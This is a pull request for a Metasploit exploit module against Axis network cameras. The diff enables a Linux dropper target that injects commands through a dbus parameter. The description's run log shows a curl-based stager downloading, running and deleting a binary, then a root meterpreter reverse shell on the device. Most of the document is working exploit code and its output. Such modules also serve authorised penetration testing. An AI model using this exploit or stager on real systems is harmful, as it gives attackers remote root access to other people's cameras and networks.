### PR TITLE
Implement dropper target in axis_srv_parhand_rce

### DIFF
--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  #include Msf::Exploit::CmdStager
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -37,8 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'DisclosureDate' => 'Jun 18 2018',
       'License'        => MSF_LICENSE,
-      'Platform'       => ['unix'],# 'linux'],
-      'Arch'           => [ARCH_CMD],# ARCH_ARMLE],
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
       'Privileged'     => true,
       'Targets'        => [
         ['Unix In-Memory',
@@ -51,16 +51,14 @@ class MetasploitModule < Msf::Exploit::Remote
            'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'}
          }
         ],
-=begin
         ['Linux Dropper',
          'Platform'    => 'linux',
          'Arch'        => ARCH_ARMLE,
          'Type'        => :linux_dropper
         ]
-=end
       ],
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'}
+      'DefaultTarget'  => 1,
+      'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}
     ))
   end
 
@@ -68,10 +66,8 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :unix_memory
       execute_command(payload.encoded)
-=begin
     when :linux_dropper
-      execute_cmdstager
-=end
+      execute_cmdstager(flavor: 'curl', nospace: true)
     end
   end
 
@@ -85,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'action'  => 'dbus',
         'args'    => dbus_send(
           method: :set_param,
-          param:  "string:root.Time.DST.Enabled string:;#{cmd};"
+          param:  "string:root.Time.DST.Enabled string:;#{cmd}"
         )
       }
     )


### PR DESCRIPTION
This was implemented and tested a few minutes before I left the office, so it worked when I last tried, but it will definitely need repro. Thanks!

```
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[*] Started reverse TCP handler on 192.168.1.55:4444
[*] Using URL: http://0.0.0.0:8080/rotdk6kH9
[*] Local IP: http://10.16.2.173:8080/rotdk6kH9
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/ntaCHACs${IFS}http://192.168.1.55:8080/rotdk6kH9;chmod${IFS}+x${IFS}/tmp/ntaCHACs;/tmp/ntaCHACs;rm${IFS}-f${IFS}/tmp/ntaCHACs"]
[*] Client 192.168.1.53 (curl/7.42.1) requested /rotdk6kH9
[*] Sending payload to 192.168.1.53 (curl/7.42.1)
[*] Command Stager progress - 100.00% done (149/149 bytes)
[*] Meterpreter session 1 opened (192.168.1.55:4444 -> 192.168.1.53:55165) at 2018-07-31 18:12:14 -0500
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : axis-accc8e6991f9.192.168.1.1
OS           :  (Linux 4.1.0)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >
```

#10300